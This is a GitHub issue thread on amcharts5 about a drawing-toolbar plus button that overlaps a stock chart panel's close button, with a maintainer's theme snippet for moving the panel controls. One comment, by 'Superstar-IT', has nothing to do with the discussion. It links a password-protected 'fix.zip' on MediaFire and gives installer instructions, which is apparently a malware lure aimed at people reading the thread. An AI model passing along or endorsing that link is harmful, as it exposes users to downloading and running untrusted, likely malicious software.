### ISSUE TITLE
Unable to close indicators stockchart

### ISSUE THREAD

**Issue by workingbuddy10** [amcharts/amcharts5#1688]
After adding this new feature of creating the horizontal lines via the plus button. One cannot close the additional panel. As the plus button overlays the close button of the panel.
- Either we have to change the close & other button position. OR
- We can hide the button when it overlays the close button ( this is it how it happens in tradingView).

https://www.amcharts.com/docs/v5/charts/stock/toolbar/drawing-control/#Adding_line_drawings

![image](https://github.com/user-attachments/assets/c9abad8c-7673-4ce1-b822-1c9a68bc1521)

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by martynasma** [comment]
You can move panel controls via custom theme:

```JavaScript
const myTheme = am5.Theme.new(root);

myTheme.rule("Grid", ["scrollbar", "minor"]).setAll({
  visible: false
});

myTheme.rule("PanelControls").setAll({
  dx: -30
});

root.setThemes([
  am5themes_Animated.new(root),
  myTheme
]);
```

**Comment by workingbuddy10** [comment]
@martynasma  It can be an enhancement, if its added in the library itself. As its a common issue!!

**Comment by martynasma** [comment]
No, it's not. The tooltip button is a custom functionality, not something that's built-in.
